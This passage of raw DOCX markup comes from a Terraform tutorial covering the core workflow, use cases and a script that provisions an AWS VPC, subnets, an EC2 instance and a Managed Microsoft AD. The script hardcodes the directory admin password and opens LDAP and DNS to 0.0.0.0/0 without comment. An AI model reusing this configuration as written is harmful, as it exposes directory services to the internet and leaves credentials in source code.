        <w:t xml:space="preserve"> Users begin by writing configuration files in the HashiCorp Configuration Language (HCL) or JSON. These files define the resources needed, such as virtual machines, networks, and storage, and specify their desired properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Initializing the Environment:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The terraform init command initializes the Terraform environment by downloading the necessary provider plugins. This step ensures that Terraform has access to the resources required to manage the infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Creating a Plan:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The terraform plan command generates an execution plan that outlines the actions Terraform will take to achieve the desired state. This plan provides a preview of the changes, allowing users to review and approve them before they are applied.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Applying Changes:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The terraform apply command applies the changes defined in the configuration files. Terraform uses the execution plan to create, update, or delete resources, ensuring that the infrastructure matches the desired state.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Destroying Resources:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> When resources are no longer needed, the terraform destroy command can be used to delete them. This command ensures that all resources managed by Terraform are removed, preventing unnecessary costs and security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:spacing w:after="28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19538"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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4"/>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b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.6 Terraform Use Cases</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Terraform is widely used for various infrastructure management scenarios, including:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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Provisioning Cloud Infrastructure:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform automates the provisioning of cloud resources, such as virtual machines, networks, and storage. By defining these resources in configuration files, users can deploy complex infrastructure quickly and consistently.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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Managing Multi-Cloud Environments:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Organizations often use Terraform to manage resources across different cloud providers. Terraform's multi-cloud capabilities allow for consistent management and configuration, reducing the complexity of maintaining hybrid environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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Infrastructure Version Control:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform configurations can be stored in version control systems like Git, enabling teams to track changes and collaborate on infrastructure management. Version control ensures that infrastructure changes are documented and can be rolled back if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_97xdjqtbksxx" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7 Terraform Script for provision of Active directory on Cloud</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wteyfcyifs0i" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7.1 Writing the Terraform Configuration File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">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create a Terraform script, start by writing a configuration file (usually named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main.tf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). This file defines the infrastructure resources using a simple, human-readable language. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240"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Configure Terraform to use AWS provider</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">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terraform {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">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required_providers {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">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aws = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">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source  = "hashicorp/aws"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">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version = "~&gt; 5.24.0"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">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83">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84">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85">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6">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provider "aws" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">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region = "us-east-1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">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89">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A">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Create a VPC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">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resource "aws_vpc" "example" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">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cidr_block           = "10.0.0.0/16"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">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enable_dns_support   = true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">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enable_dns_hostnames = true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">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tags = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">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Name = "example-vpc"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">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92">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93">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4">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Create two subnets in different availability zones for AD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">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resource "aws_subnet" "example_a" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">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vpc_id                  = aws_vpc.example.id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">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cidr_block              = "10.0.1.0/24"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">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availability_zone       = "us-east-1a"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">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map_public_ip_on_launch = true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">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tags = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">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Name = "example-subnet-a"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">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9D">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9E">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F">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resource "aws_subnet" "example_b" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">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vpc_id                  = aws_vpc.example.id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">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cidr_block              = "10.0.2.0/24"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">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availability_zone       = "us-east-1b"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">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map_public_ip_on_launch = true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">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tags = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">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Name = "example-subnet-b"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">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A7">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A8">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9">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Create a Security Group for AD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">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resource "aws_security_group" "ad_sg" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">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vpc_id = aws_vpc.example.id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">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D">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ingress {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">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from_port   = 389</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">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to_port     = 389</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">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protocol    = "tcp"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">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cidr_blocks = ["0.0.0.0/0"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">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description = "Allow LDAP access"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">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B4">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5">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ingress {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">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from_port   = 53</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">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to_port     = 53</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">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protocol    = "udp"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">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cidr_blocks = ["0.0.0.0/0"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">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description = "Allow DNS queries"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">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BC">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D">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egress {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">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from_port   = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">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to_port     = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">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protocol    = "-1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">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cidr_blocks = ["0.0.0.0/0"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">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description = "Allow all outbound traffic"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">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C4">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5">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tags = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">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Name = "AD-Security-Group"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">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C8">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C9">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A">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Create an EC2 instance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">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resource "aws_instance" "example" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">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ami           = "ami-0c55b159cbfafe1f0"  # Update with a valid AMI ID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">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instance_type = "t2.micro"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">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subnet_id     = aws_subnet.example_a.id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">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tags = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">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Name = "example-instance"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">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D2">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D3">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4">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Create a directory in AWS Directory Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">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resource "aws_directory_service_directory" "example" {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">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name     = "example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">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password = "SuperSecretPassword!"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8">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size     = "Small"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">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type     = "MicrosoftAD"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">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DB">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vpc_settings {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">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vpc_id     = aws_vpc.example.id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">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subnet_ids = [aws_subnet.example_a.id, aws_subnet.example_b.id]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">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DF">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0">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tags = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">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Name = "example-directory"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">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E3">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E4">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pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cv0k59irkc5a" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7.2 Organizing Terraform Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">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larger projects, organize Terraform configurations into multiple files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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main.tf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Core resources and provider configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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variables.tf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Variable declarations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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outputs.tf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Output definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">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structure helps manage complexity and improves readability.</w:t>
      </w:r>
